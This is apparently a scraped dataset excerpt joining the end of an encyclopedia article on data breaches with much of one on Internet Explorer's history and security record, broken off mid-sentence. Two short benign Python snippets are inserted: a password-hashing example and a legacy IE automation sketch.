organized crime, 10 percent by system administrators, 10 percent by end users such as customers or employees, and 10 percent by states or state-affiliated actors. 
14 Opportunistic criminals may cause data breaches—often using malware or social engineering attacks, but they will typically move on if the security is above average. More organized criminals have more resources and are more focused in their targeting of particular data. 15 Both of them sell the information they obtain for financial gain. 16 Another source of data breaches are politically motivated hackers, for example Anonymous, that target particular objectives. 17 State-sponsored hackers target either citizens of their country or foreign entities, for such purposes as political repression and espionage. Often they use undisclosed zero-day vulnerabilities for which the hackers are paid large sums of money. 18 The Pegasus spyware—a no-click malware developed by the Israeli company NSO Group that can be installed on most cellphones and spies on the users' activity—has drawn attention both for use against criminals such as drug kingpin El Chapo as well as political dissidents, facilitating the murder of Jamal Khashoggi. 19 Despite developers' goal of delivering a product that works entirely as intended, virtually all software and hardware contains bugs. 20 If a bug creates a security risk, it is called a vulnerability. 21 22 23 Patches are often released to fix identified vulnerabilities, but those that remain unknown (zero days) as well as those that have not been patched are still liable for exploitation. 24 Both software written by the target of the breach and third party software used by them are vulnerable to attack. 22 The software vendor is rarely legally liable for the cost of breaches, thus creating an incentive to make cheaper but less secure software. 25 Vulnerabilities vary in their ability to be exploited by malicious actors. The most valuable allow the attacker to inject and run their own code (called malware), without the user being aware of it. 21 Some malware is downloaded by users via clicking on a malicious link, but it is also possible for malicious web applications to download malware just from visiting the website (drive-by download). Keyloggers, a type of malware that records a user's keystrokes, are often used in data breaches. 26 The majority of data breaches could have been averted by storing all sensitive information in an encrypted format. That way, physical possession of the storage device or access to encrypted information is useless unless the attacker has the encryption key. 27 Hashing is also a good solution for keeping passwords safe from brute-force attacks, but only if the algorithm is sufficiently secure. 28 Many data breaches occur on the hardware operated by a partner of the organization targeted—including the 2013 Target data breach and 2014 JPMorgan Chase data breach. 29 Outsourcing work to a third party leads to a risk of data breach if that company has lower security standards; in particular, small companies often lack the resources to take as many security precautions. 30 29 As a result, outsourcing agreements often include security guarantees and provisions for what happens in the event of a data breach. 30 Human causes of breach are often based on trust of another actor that turns out to be malicious. Social engineering attacks rely on tricking an insider into doing something that compromises the system's security, such as revealing a password or clicking a link to download malware. 31 Data breaches may also be deliberately caused by insiders. 
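The passage above notes that hashing protects stored passwords only if the algorithm is strong enough. A minimal sketch of salted, deliberately slow hashing with the standard library's PBKDF2 follows; the helper names and iteration count are illustrative choices, not a vetted security recommendation.

import hashlib
import hmac
import os

def hash_password(password, salt=None, iterations=600_000):
    """Salted, slow password hash using PBKDF2-HMAC-SHA256."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify_password(password, salt, expected, iterations=600_000):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, expected)      # constant-time comparison

salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))   # True
print(verify_password("wrong guess", salt, digest))                    # False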
32 One type of social engineering, phishing, 31 obtains a user's credentials by sending them a malicious message impersonating a legitimate entity, such as a bank, and getting the user to enter their credentials onto a malicious website controlled by the cybercriminal. Two-factor authentication can prevent the malicious actor from using the credentials. 33 Training employees to recognize social engineering is another common strategy. 34 Another source of breaches is accidental disclosure of information, for example publishing information that should be kept private. 35 36 With the increase in remote work and bring your own device policies, large amounts of corporate data is stored on personal devices of employees. Via carelessness or disregard of company security policies, these devices can be lost or stolen. 37 Technical solutions can prevent many causes of human error, such as encrypting all sensitive data, preventing employees from using insecure passwords, installing antivirus software to prevent malware, and implementing a robust patching system to ensure that all devices are kept up to date. 38 Although attention to security can reduce the risk of data breach, it cannot bring it to zero. Security is not the only priority of organizations, and an attempt to achieve perfect security would make the technology unusable. 39 Many companies hire a chief information security officer (CISO) to oversee the company's information security strategy. 40 To obtain information about potential threats, security professionals will network with each other and share information with other organizations facing similar threats. 41 Defense measures can include an updated incident response strategy, contracts with digital forensics firms that could investigate a breach, 42 cyber insurance, 43 7 and monitoring the dark web for stolen credentials of employees. 44 In 2024, the United States National Institute of Standards and Technology (NIST) issued a special publication, "Data Confidentiality: Identifying and Protecting Assets Against Data Breaches". 45 The NIST Cybersecurity Framework also contains information about data protection. 46 Other organizations have released different standards for data protection. 47 The architecture of a company's systems plays a key role in deterring attackers. Daswani and Elbayadi recommend having only one means of authentication, 48 avoiding redundant systems, and making the most secure setting default. 49 Defense in depth and distributed privilege (requiring multiple authentications to execute an operation) also can make a system more difficult to hack. 50 Giving employees and software the least amount of access necessary to fulfill their functions (principle of least privilege) limits the likelihood and damage of breaches. 48 51 Several data breaches were enabled by reliance on security by obscurity; the victims had put access credentials in publicly accessible files. 52 Nevertheless, prioritizing ease of use is also important because otherwise users might circumvent the security systems. 53 Rigorous software testing, including penetration testing, can reduce software vulnerabilities, and must be performed prior to each release even if the company is using a continuous integration continuous deployment model where new versions are constantly being rolled out. 54 The principle of least persistence 55 —avoiding the collection of data that is not necessary and destruction of data that is no longer necessary—can mitigate the harm from breaches. 
56 57 58 The challenge is that destroying data can be more complex with modern database systems. 59 A large number of data breaches are never detected. 60 Of those that are, most breaches are detected by third parties; 61 62 others are detected by employees or automated systems. 63 Responding to breaches is often the responsibility of a dedicated computer security incident response team, often including technical experts, public relations, and legal counsel. 64 65 Many companies do not have sufficient expertise in-house, and subcontract some of these roles; 66 often, these outside resources are provided by the cyber insurance policy. 67 After a data breach becomes known to the company, the next steps typically include confirming it occurred, notifying the response team, and attempting to contain the damage. 68 To stop exfiltration of data, common strategies include shutting down affected servers, taking them offline, patching the vulnerability, and rebuilding. 69 Once the exact way that the data was compromised is identified, there is typically only one or two technical vulnerabilities that need to be addressed in order to contain the breach and prevent it from reoccurring. 70 A penetration test can then verify that the fix is working as expected. 71 If malware is involved, the organization must investigate and close all infiltration and exfiltration vectors, as well as locate and remove all malware from its systems. 72 If data was posted on the dark web, companies may attempt to have it taken down. 73 Containing the breach can compromise investigation, and some tactics (such as shutting down servers) can violate the company's contractual obligations. 74 Gathering data about the breach can facilitate later litigation or criminal prosecution, 75 but only if the data is gathered according to legal standards and the chain of custody is maintained. 76 Database forensics can narrow down the records involved, limiting the scope of the incident. 77 Extensive investigation may be undertaken, which can be even more expensive than litigation. 62 In the United States, breaches may be investigated by government agencies such as the Office for Civil Rights, the United States Department of Health and Human Services, and the Federal Trade Commission (FTC). 78 Law enforcement agencies may investigate breaches 79 although the hackers responsible are rarely caught. 80 Notifications are typically sent out as required by law. 81 Many companies offer free credit monitoring to people affected by a data breach, although only around 5 percent of those eligible take advantage of the service. 82 Issuing new credit cards to consumers, although expensive, is an effective strategy to reduce the risk of credit card fraud. 82 Companies try to restore trust in their business operations and take steps to prevent a breach from reoccurring. 83 After a data breach, criminals make money by selling data, such as usernames, passwords, social media or customer loyalty account information, debit and credit card numbers, 16 and personal health information (see medical data breach). 84 Criminals often sell this data on the dark web—parts of the internet where it is difficult to trace users and illicit activity is widespread—using platforms like .onion or I2P. 85 Originating in the 2000s, the dark web, followed by untraceable cryptocurrencies such as Bitcoin in the 2010s, made it possible for criminals to sell data obtained in breaches with minimal risk of getting caught, facilitating an increase in hacking. 
86 87 One popular darknet marketplace, Silk Road, was shut down in 2013 and its operators arrested, but several other marketplaces emerged in its place. 88 Telegram is also a popular forum for illegal sales of data. 89 This information may be used for a variety of purposes, such as spamming, obtaining products with a victim's loyalty or payment information, identity theft, prescription drug fraud, or insurance fraud. 90 The threat of data breach or revealing information obtained in a data breach can be used for extortion. 16 Consumers may suffer various forms of tangible or intangible harm from the theft of their personal data, or not notice any harm. 91 A significant portion of those affected by a data breach become victims of identity theft. 82 A person's identifying information often circulates on the dark web for years, causing an increased risk of identity theft regardless of remediation efforts. 80 92 Even if a customer does not end up footing the bill for credit card fraud or identity theft, they have to spend time resolving the situation. 93 94 Intangible harms include doxxing (publicly revealing someone's personal information), for example medication usage or personal photos. 95 There is little empirical evidence of economic harm from breaches except the direct cost, although there is some evidence suggesting a temporary, short-term decline in stock price. 96 Other impacts on the company can range from lost business, reduced employee productivity due to systems being offline or personnel redirected to working on the breach, 97 resignation or firing of senior executives, 78 reputational damage, 78 98 and increasing the future cost of auditing or security. 78 Consumer losses from a breach are usually a negative externality for the business. 99 Some experts have argued that the evidence suggests there is not enough direct costs or reputational damage from data breaches to sufficiently incentivize their prevention. 100 101 Estimating the cost of data breaches is difficult, both because not all breaches are reported and also because calculating the impact of breaches in financial terms is not straightforward. There are multiple ways of calculating the cost to businesses, especially when it comes to personnel time dedicated to dealing with the breach. 102 Author Kevvie Fowler estimates that more than half the direct cost incurred by companies is in the form of litigation expenses and services provided to affected individuals, with the remaining cost split between notification and detection, including forensics and investigation. He argues that these costs are reduced if the organization has invested in security prior to the breach or has previous experience with breaches. The more data records involved, the more expensive a breach typically will be. 103 In 2016, researcher Sasha Romanosky estimated that while the mean breach cost around the targeted firm $5 million, this figure was inflated by a few highly expensive breaches, and the typical data breach was much less costly, around $200,000. Romanosky estimated the total annual cost to corporations in the United States to be around $10 billion. 104 The law regarding data breaches is often found in legislation to protect privacy more generally, and is dominated by provisions mandating notification when breaches occur. 105 Laws differ greatly in how breaches are defined, 3 what type of information is protected, the deadline for notification, 6 and who has standing to sue if the law is violated. 
106 Notification laws increase transparency and provide a reputational incentive for companies to reduce breaches. 107 The cost of notifying the breach can be high if many people were affected and is incurred regardless of the company's responsibility, so it can function like a strict liability fine. 108 As of 2024 update , Thomas on Data Breach listed 62 United Nations member states that are covered by data breach notification laws. Some other countries require breach notification in more general data protection laws. 109 Shortly after the first reported data breach in April 2002, California passed a law requiring notification when an individual's personal information was breached. 9 In the United States, notification laws proliferated after the February 2005 ChoicePoint data breach, widely publicized in part because of the large number of people affected (more than 140,000) and also because of outrage that the company initially informed only affected people in California. 110 111 In 2018, the European Union's General Data Protection Regulation (GDPR) took effect. The GDPR requires notification within 72 hours, with very high fines possible for large companies not in compliance. This regulation also stimulated the tightening of data privacy laws elsewhere. 112 113 As of 2022 update , the only United States federal law requiring notification for data breaches is limited to medical data regulated under HIPAA, but all 50 states (since Alabama passed a law in 2018) have their own general data breach notification laws. 113 Measures to protect data from a breach are typically absent from the law or vague. 105 Filling this gap is standards required by cyber insurance, which is held by most large companies and functions as de facto regulation. 114 115 Of the laws that do exist, there are two main approaches—one that prescribes specific standards to follow, and the reasonableness approach. 116 The former is rarely used due to a lack of flexibility and reluctance of legislators to arbitrate technical issues; with the latter approach, the law is vague but specific standards can emerge from case law. 117 Companies often prefer the standards approach for providing greater legal certainty, but they might check all the boxes without providing a secure product. 118 An additional flaw is that the laws are poorly enforced, with penalties often much less than the cost of a breach, and many companies do not follow them. 119 Many class-action lawsuits, derivative suits, and other litigation have been brought after data breaches. 120 They are often settled regardless of the merits of the case due to the high cost of litigation. 121 122 Even if a settlement is paid, few affected consumers receive any money as it usually is only cents to a few dollars per victim. 78 122 Legal scholars Daniel J. Solove and Woodrow Hartzog argue that "Litigation has increased the costs of data breaches but has accomplished little else. 123 Plaintiffs often struggle to prove that they suffered harm from a data breach. 123 The contribution of a company's actions to a data breach varies, 119 124 and likewise the liability for the damage resulting for data breaches is a contested matter. It is disputed what standard should be applied, whether it is strict liability, negligence, or something else. 124 |
113 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Internet_Explorer | Internet Explorer a (formerly Microsoft Internet Explorer b and Windows Internet Explorer, c commonly abbreviated as IE or MSIE) is a retired series of graphical web browsers developed by Microsoft that were used in the Windows line of operating systems. While IE has been discontinued on most Windows editions, it remains supported on certain editions of Windows, such as Windows 10 LTSB LTSC. 6 Starting in 1995, it was first released as part of the add-on package Plus for Windows 95 that year. Later versions were available as free downloads or in-service packs and included in the original equipment manufacturer (OEM) service releases of Windows 95 and later versions of Windows. Microsoft spent over US$100 million per year on Internet Explorer in the late 1990s, 7 with over 1,000 people involved in the project by 1999. 8 9 New feature development for the browser was discontinued in 2016 10 and ended support on June 15, 2022 for Windows 10 Semi-Annual Channel (SAC), in favor of its successor, Microsoft Edge. Internet Explorer was once the most widely used web browser, attaining a peak of 95% usage share by 2003. 11 It has since fallen out of general use after retirement. This came after Microsoft used bundling to win the first browser war against Netscape, which was the dominant browser in the 1990s. Its usage share has since declined with the launches of Firefox (2004) and Google Chrome (2008) and with the growing popularity of mobile operating systems such as Android and iOS that do not support Internet Explorer. Microsoft Edge, IE's successor, first overtook Internet Explorer in terms of market share in November 2019. Versions of Internet Explorer for other operating systems have also been produced, including an Xbox 360 version called Internet Explorer for Xbox and for platforms Microsoft no longer supports: Internet Explorer for Mac and Internet Explorer for UNIX (Solaris and HP-UX), and an embedded OEM version called Pocket Internet Explorer, later rebranded Internet Explorer Mobile, made for Windows CE, Windows Phone, and, previously, based on Internet Explorer 7, for Windows Phone 7. The browser has been scrutinized throughout its development for its use of third-party technology (such as the source code of Spyglass Mosaic, used without royalty in early versions) and security and privacy vulnerabilities, and the United States and the European Union have determined that the integration of Internet Explorer with Windows has been to the detriment of fair browser competition. Internet Explorer 7 was supported on Windows Embedded Compact 2013 until October 10, 2023. 12 The core of Internet Explorer 11 will continue being shipped and supported until at least 2029 as IE Mode, a feature of Microsoft Edge, enabling Edge to display web pages using Internet Explorer 11's Trident layout engine and other components. 13 Through IE Mode, the underlying technology of Internet Explorer 11 partially exists on versions of Windows that do not support IE11 as a proper application, including newer versions of Windows 10, as well as Windows 11, Windows Server Insider Build 22463 and Windows Server Insider Build 25110. 14 The Internet Explorer project was started in the summer of 1994 by Thomas Reardon, 15 who, according to former project lead Ben Slivka, 16 used source code from Spyglass, Inc. 
Mosaic, which was an early commercial web browser with formal ties to the pioneering National Center for Supercomputing Applications (NCSA) Mosaic browser. 17 18 In late 1994, Microsoft licensed Spyglass Mosaic for a quarterly fee plus a percentage of Microsoft's non-Windows revenues for the software. 18 Although bearing a name like NCSA Mosaic, Spyglass Mosaic had used the NCSA Mosaic source code sparingly. 19 The first version, dubbed Microsoft Internet Explorer, was installed as part of the Internet Jumpstart Kit in the Microsoft Plus pack for Windows 95. 20 The Internet Explorer team began with about six people in early development. 19 21 Internet Explorer 1.5 was released several months later for Windows NT and added support for basic table rendering. By including it free of charge with their operating system, they did not have to pay royalties to Spyglass Inc, resulting in a lawsuit and a US$8 million settlement on January 22, 1997. 17 18 Microsoft was sued by SyNet Inc. in 1996, for trademark infringement, claiming it owned the rights to the name "Internet Explorer. 22 It ended with Microsoft paying $5 million to settle the lawsuit. 23 Internet Explorer 2 is the second major version of Internet Explorer, released on November 22, 1995, for Windows 95 and Windows NT, and on April 23, 1996, for Apple Macintosh 24 and Windows 3.1. 25 Internet Explorer 3 is the third major version of Internet Explorer, released on August 13, 1996, for Microsoft Windows and on January 8, 1997, for Apple Mac OS. Internet Explorer 4 is the fourth major version of Internet Explorer, released in September 1997 for Microsoft Windows, Mac OS, Solaris, and HP-UX. It was the first version of Internet Explorer to use the Trident web engine. Internet Explorer 5 is the fifth major version of Internet Explorer, released on March 18, 1999, for Windows 3.1, Windows NT 3, Windows 95, Windows NT 4.0 SP3, Windows 98, Mac OS X (up to v5.2.3), Classic Mac OS (up to v5.1.7), Solaris and HP-UX (up to 5.01 SP1). Internet Explorer 6 is the sixth major version of Internet Explorer, released on August 24, 2001, for Windows NT 4.0 SP6a, Windows 98, Windows 2000, Windows ME and as the default web browser for Windows XP and Windows Server 2003. Internet Explorer 7 is the seventh major version of Internet Explorer, released on October 18, 2006, for Windows XP SP2, Windows Server 2003 SP1 and as the default web browser for Windows Vista, Windows Server 2008 and Windows Embedded POSReady 2009. IE7 introduces tabbed browsing. Internet Explorer 8 is the eighth major version of Internet Explorer, released on March 19, 2009, for Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 and as the default web browser for Windows 7 (later default was Internet Explorer 11) and Windows Server 2008 R2. Internet Explorer 9 is the ninth major version of Internet Explorer, released on March 14, 2011, for Windows 7, Windows Server 2008 R2, Windows Vista Service Pack 2 and Windows Server 2008 SP2 with the Platform Update. Internet Explorer 10 is the tenth major version of Internet Explorer, released on October 26, 2012, and is the default web browser for Windows 8 and Windows Server 2012. It became available for Windows 7 SP1 and Windows Server 2008 R2 SP1 in February 2013. Internet Explorer 11 is featured in Windows 8.1, Windows Server 2012 R2 and Windows RT 8.1, which was released on October 17, 2013. It includes an incomplete mechanism for syncing tabs. 
It is a major update to its developer tools, 26 27 enhanced scaling for high DPI screens, 28 HTML5 prerender and prefetch, 29 hardware-accelerated JPEG decoding, 30 closed captioning, HTML5 full screen, 31 and is the first Internet Explorer to support WebGL 32 33 34 and Google's protocol SPDY (starting at v3). 35 This version of IE has features dedicated to Windows 8.1, including cryptography (WebCrypto), 26 adaptive bitrate streaming (Media Source Extensions) 36 and Encrypted Media Extensions. 31 Internet Explorer 11 was made available for Windows 7 users to download on November 7, 2013, with Automatic Updates in the following weeks. 37 Internet Explorer 11's user agent string now identifies the agent as "Trident" (the underlying browser engine) instead of "MSIE. It also announces compatibility with Gecko (the browser engine of Firefox). Microsoft claimed that Internet Explorer 11, running the WebKit SunSpider JavaScript Benchmark, was the fastest browser as of October 15, 2013. 38 Internet Explorer 11 was made available for Windows Server 2012 and Windows Embedded 8 Standard, the only still supported edition of Windows 8 in April 2019. 39 Microsoft Edge was officially unveiled on January 21, 2015 as "Project Spartan. 40 41 On April 29, 2015, Microsoft announced that Microsoft Edge would replace Internet Explorer as the default browser in Windows 10. 42 However, Internet Explorer remained the default web browser on the Windows 10 Long Term Servicing Channel (LTSC) and on Windows Server until 2021, primarily for enterprise purposes. 43 44 45 46 Internet Explorer is still installed in Windows 10 to maintain compatibility with older websites and intranet sites that require ActiveX and other legacy web technologies. 40 41 The browser's MSHTML rendering engine also remains for compatibility reasons. Additionally, Microsoft Edge shipped with the "Internet Explorer mode" feature, which enables support for legacy internet applications. This is possible through use of the Trident MSHTML engine, the rendering code of Internet Explorer. 47 48 Microsoft has committed to supporting Internet Explorer mode at least through 2029, with a one-year notice before it is discontinued. 49 With the release of Microsoft Edge, the development of new features for Internet Explorer ceased. Internet Explorer 11 was the final release, and Microsoft began the process of deprecating Internet Explorer. During this process, it will still be maintained as part of Microsoft's support policies. 10 Since January 12, 2016, only the latest version of Internet Explorer available for each version of Windows has been supported. 50 51 At the time, nearly half of Internet Explorer users were using an unsupported version. 52 In February 2019, Microsoft Chief of Security Chris Jackson recommended that users stop using Internet Explorer as their default browser. 53 Various websites have dropped support for Internet Explorer. On June 1, 2020, the Internet Archive removed Internet Explorer from its list of supported browsers, due to the browser's dated nature. 54 Since November 30, 2020, the web version of Microsoft Teams can no longer be accessed using Internet Explorer 11, followed by the remaining Microsoft 365 applications since August 17, 2021. 55 56 WordPress also dropped support for the browser in July 2021. 
57 Microsoft disabled the normal means of launching Internet Explorer in Windows 11 and later versions of Windows 10, 58 but it is still possible for users to launch the browser from the Control Panel's browser toolbar settings or via PowerShell. 59 On June 15, 2022, Internet Explorer 11 support ended for the Windows 10 Semi-Annual Channel (SAC). Users on these versions of Windows 10 were redirected to Microsoft Edge starting on February 14, 2023, and visual references to the browser (such as icons on the taskbar) would have been removed on June 13, 2023. However, on May 19, 2023 various organizations disapproved, leading Microsoft to withdraw the change. 60 61 Other versions of Windows that were still supported at the time were unaffected. Specifically, Windows 7 ESU, Windows 8.x, Windows RT; Windows Server 2008 R2 ESU, Windows Server 2012 R2 and later; and Windows 10 LTSB LTSC continued to receive updates until their respective end of life dates. 62 63 64 65 On other versions of Windows, Internet Explorer will still be supported until their own end of support dates. IE7 was supported until October 10, 2023 alongside the end of support for Windows Embedded Compact 2013, while IE9 was supported until January 9, 2024 alongside the end of ESU support for Azure customers on Windows Server 2008. 51 Barring additional changes to the support policy, Internet Explorer 11 will be supported until January 13, 2032, concurrent with the end of support for Windows 10 IoT Enterprise LTSC 2021. 66 51 Internet Explorer has been designed to view a broad range of web pages and provide certain features within the operating system, including Microsoft Update. During the height of the browser wars, Internet Explorer superseded Netscape only when it caught up technologically to support the progressive features of the time. 68 better source needed Internet Explorer, using the MSHTML (Trident) browser engine: Internet Explorer uses DOCTYPE sniffing to choose between standards mode and a "quirks mode" in which it deliberately mimics nonstandard behaviors of old versions of MSIE for HTML and CSS rendering on screen (Internet Explorer always uses standards mode for printing). It also provides its own dialect of ECMAScript called JScript. Internet Explorer was criticized by Tim Berners-Lee for its limited support for SVG, which is promoted by W3C. 72 Internet Explorer has introduced an array of proprietary extensions to many of the standards, including HTML, CSS, and the DOM. This has resulted in several web pages that appear broken in standards-compliant web browsers and has introduced the need for a "quirks mode" to allow for rendering improper elements meant for Internet Explorer in these other browsers. Internet Explorer has introduced several extensions to the DOM that have been adopted by other browsers. These include the inner HTML property, which provides access to the HTML string within an element, which was part of IE 5 and was standardized as part of HTML 5 roughly 15 years later after all other browsers implemented it for compatibility, 73 the XMLHttpRequest object, which allows the sending of HTTP request and receiving of HTTP response, and may be used to perform AJAX, and the designMode attribute of the content Document object, which enables rich text editing of HTML documents. citation needed Some of these functionalities were not possible until the introduction of the W3C DOM methods. 
Its Ruby character extension to HTML is also accepted as a module in W3C XHTML 1.1, though it is not found in all versions of W3C HTML. Microsoft submitted several other features of IE for consideration by the W3C for standardization. These include the 'behavior' CSS property, which connects the HTML elements with JScript behaviors (known as HTML Components, HTC), HTML TIME profile, which adds timing and media synchronization support to HTML documents (similar to the W3C XHTML SMIL), and the VML vector graphics file format. However, all were rejected, at least in their original forms; VML was subsequently combined with PGML (proposed by Adobe and Sun), resulting in the W3C-approved SVG format, one of the few vector image formats being used on the web, which IE did not support until version 9. 74 Other non-standard behaviors include: support for vertical text, but in a syntax different from W3C CSS3 candidate recommendation, support for a variety of image effects 75 and page transitions, which are not found in W3C CSS, support for obfuscated script code, in particular JScript.Encode, 76 as well as support for embedding EOT fonts in web pages. 77 Support for favicons was first added in Internet Explorer 5. 78 Internet Explorer supports favicons in PNG, static GIF and native Windows icon formats. In Windows Vista and later, Internet Explorer can display native Windows icons that have embedded PNG files. 79 80 Internet Explorer makes use of the accessibility framework provided in Windows. Internet Explorer is also a user interface for FTP, with operations similar to Windows Explorer. Internet Explorer 5 and 6 had a side bar for web searches, enabling jumps through pages from results listed in the side bar. 81 Pop-up blocking and tabbed browsing were added respectively in Internet Explorer 6 and Internet Explorer 7. Tabbed browsing can also be added to older versions by installing MSN Search Toolbar or Yahoo Toolbar. Internet Explorer caches visited content in the Temporary Internet Files folder to allow quicker access (or offline access) to previously visited pages. The content is indexed in a database file, known as Index.dat. Multiple Index.dat files exist which index different content—visited content, web feeds, visited URLs, cookies, etc. 82 Prior to IE7, clearing the cache used to clear the index but the files themselves were not reliably removed, posing a potential security and privacy risk. In IE7 and later, when the cache is cleared, the cache files are more reliably removed, and the index.dat file is overwritten with null bytes. Caching has been improved in IE9. 83 Internet Explorer is fully configurable using Group Policy. Administrators of Windows Server domains (for domain-joined computers) or the local computer can apply and enforce a variety of settings on computers that affect the user interface (such as disabling menu items and individual configuration options), as well as underlying security features such as downloading of files, zone configuration, per-site settings, ActiveX control behavior and others. Policy settings can be configured for each user and for each machine. Internet Explorer also supports Integrated Windows Authentication. Internet Explorer uses a componentized architecture built on the Component Object Model (COM) technology. 
It consists of several major components, each of which is contained in a separate dynamic-link library (DLL) and exposes a set of COM programming interfaces hosted by the Internet Explorer main executable, iexplore.exe: 84 Internet Explorer does not include any native scripting functionality. Rather, MSHTML.dll exposes an API that permits a programmer to develop a scripting environment to be plugged-in and to access the DOM tree. Internet Explorer 8 includes the bindings for the Active Scripting engine, which is a part of Microsoft Windows and allows any language implemented as an Active Scripting module to be used for client-side scripting. By default, only the JScript and VBScript modules are provided; third party implementations like ScreamingMonkey (for ECMAScript 4 support) can also be used. Microsoft also makes available the Microsoft Silverlight runtime that allows CLI languages, including DLR-based dynamic languages like IronPython and IronRuby, to be used for client-side scripting. Internet Explorer 8 introduced some major architectural changes, called loosely coupled IE (LCIE). LCIE separates the main window process (frame process) from the processes hosting the different web applications in different tabs (tab processes). A frame process can create multiple tab processes, each of which can be of a different integrity level, each tab process can host multiple web sites. The processes use asynchronous inter-process communication to synchronize themselves. Generally, there will be a single frame process for all web sites. In Windows Vista with protected mode turned on, however, opening privileged content (such as local HTML pages) will create a new tab process as it will not be constrained by protected mode. 86 Internet Explorer exposes a set of Component Object Model (COM) interfaces that allows add-ons to extend the functionality of the browser. 84 Extensibility is divided into two types: Browser extensibility and content extensibility. Browser extensibility involves adding context menu entries, toolbars, menu items or Browser Helper Objects (BHO). BHOs are used to extend the feature set of the browser, whereas the other extensibility options are used to expose that feature in the user interface. Content extensibility adds support for non-native content formats. 84 It allows Internet Explorer to handle new file formats and new protocols, e.g. WebM or SPDY. 84 In addition, web pages can integrate widgets known as ActiveX controls which run on Windows only but have vast potentials to extend the content capabilities; Adobe Flash Player and Microsoft Silverlight are examples. 84 Add-ons can be installed either locally, or directly by a web site. Since malicious add-ons can compromise the security of a system, Internet Explorer implements several safeguards. Internet Explorer 6 with Service Pack 2 and later feature an Add-on Manager for enabling or disabling individual add-ons, complemented by a "No Add-Ons" mode. Starting with Windows Vista, Internet Explorer and its BHOs run with restricted privileges and are isolated from the rest of the system. Internet Explorer 9 introduced a new component Add-on Performance Advisor. Add-on Performance Advisor shows a notification when one or more of installed add-ons exceed a pre-set performance threshold. The notification appears in the Notification Bar when the user launches the browser. Windows 8 and Windows RT introduce a Metro-style version of Internet Explorer that is entirely sandboxed and does not run add-ons at all. 
87 In addition, Windows RT cannot download or install ActiveX controls at all; although existing ones bundled with Windows RT still run in the traditional version of Internet Explorer. 87 Internet Explorer itself can be hosted by other applications via a set of COM interfaces. This can be used to embed the browser functionality inside a computer program or create Internet Explorer shells. 84 Internet Explorer uses a zone-based security framework that groups sites based on certain conditions, including whether it is an Internet- or intranet-based site as well as a user-editable whitelist. Security restrictions are applied per zone; all the sites in a zone are subject to the restrictions. Internet Explorer 6 SP2 onwards uses the Attachment Execution Service of Microsoft Windows to mark executable files downloaded from the Internet as being potentially unsafe. Accessing files marked as such will prompt the user to make an explicit trust decision to execute the file, as executables originating from the Internet can be potentially unsafe. This helps in preventing the accidental installation of malware. Internet Explorer 7 introduced the phishing filter, which restricts access to phishing sites unless the user overrides the decision. With version 8, it also blocks access to sites known to host malware. Downloads are also checked to see if they are known to be malware-infected. In Windows Vista, Internet Explorer by default runs in what is called Protected Mode, where the privileges of the browser itself are severely restricted—it cannot make any system-wide changes. One can optionally turn this mode off, but this is not recommended. This also effectively restricts the privileges of any add-ons. As a result, even if the browser or any add-on is compromised, the damage the security breach can cause is limited. Patches and updates to the browser are released periodically and made available through the Windows Update service, as well as through Automatic Updates. Although security patches continue to be released for a range of platforms, most feature additions and security infrastructure improvements are only made available on operating systems that are in Microsoft's mainstream support phase. On December 16, 2008, Trend Micro recommended users switch to rival browsers until an emergency patch was released to fix a potential security risk which "could allow outside users to take control of a person's computer and steal their passwords. Microsoft representatives countered this recommendation, claiming that "0.02% of internet sites" were affected by the flaw. A fix for the issue was released the following day with the Security Update for Internet Explorer KB960714, on Microsoft Windows Update. 88 89 In 2010, Germany's Federal Office for Information Security, known by its German initials, BSI, advised "temporary use of alternative browsers" because of a "critical security hole" in Microsoft's software that could allow hackers to remotely plant and run malicious code on Windows PCs. 90 In 2011, a report by Accuvant, funded by Google, rated the security (based on sandboxing) of Internet Explorer worse than Google Chrome but better than Mozilla Firefox. 91 92 A 2017 browser security white paper comparing Google Chrome, Microsoft Edge, and Internet Explorer 11 by X41 D-Sec in 2017 came to similar conclusions, also based on sandboxing and support of legacy web technologies. 
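The COM hosting described above is also how older Windows scraping scripts drove Internet Explorer to render a page before reading it. This is a hedged, legacy-only sketch, assuming a Windows machine where the Internet Explorer COM components are still present and the pywin32 package is installed (pip install pywin32); the target URL is a placeholder.

import time
import win32com.client  # pywin32; Windows-only, requires the IE/MSHTML components

ie = win32com.client.Dispatch("InternetExplorer.Application")
ie.Visible = False
ie.Navigate("https://example.com")  # placeholder URL

# Wait until the page has finished loading (ReadyState 4 = READYSTATE_COMPLETE).
while ie.Busy or ie.ReadyState != 4:
    time.sleep(0.5)

# The hosted browser exposes the rendered DOM, including script-generated content.
html = ie.Document.body.innerHTML
ie.Quit()
print(len(html))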
93 Internet Explorer has been subjected to many security vulnerabilities and concerns such that the volume of criticism for IE is unusually high. Much of the spyware, adware, and computer viruses across the Internet are made possible by exploitable bugs and flaws in the security architecture of Internet Explorer, sometimes requiring nothing more than viewing of a malicious web page to install themselves. This is known as a "drive-by install. There are also attempts to trick the user into installing malicious software by misrepresenting the software's true purpose in the description section of an ActiveX security alert. A number of security flaws affecting IE originated not in the browser itself, but in ActiveX-based add-ons used by it. Because the add-ons have the same privilege as IE, the flaws can be as critical as browser flaws. This has led to the ActiveX-based architecture being criticized for being fault-prone. By 2005, some experts maintained that the dangers of ActiveX had been overstated and there were safeguards in place. 94 In 2006, new techniques using automated testing found more than a hundred vulnerabilities in standard Microsoft ActiveX components. 95 Security features introduced in Internet Explorer 7 mitigated some of these vulnerabilities. In 2008, Internet Explorer had a number of published security vulnerabilities. According to research done by security research firm Secunia, Microsoft did not respond as quickly as its competitors in fixing security holes and making patches available. 96 The firm also reported 366 vulnerabilities in ActiveX controls, an increase from the previous year. According to an October 2010 report in The Register, researcher Chris Evans had detected a known security vulnerability which, then dating back to 2008, had not been fixed for at least six hundred days. 97 Microsoft says that it had known about this vulnerability, but it was of exceptionally low severity as the victim web site must be configured in a peculiar way for this attack to be feasible at all. 98 In December 2010, researchers were able to bypass the "Protected Mode" feature in Internet Explorer. 99 In an advisory on January 14, 2010, Microsoft said that attackers targeting Google and other U.S. companies used software that exploits a security hole, which had already been patched, in Internet Explorer. The vulnerability affected Internet Explorer 6 from on Windows XP and Server 2003, IE6 SP1 on Windows 2000 SP4, IE7 on 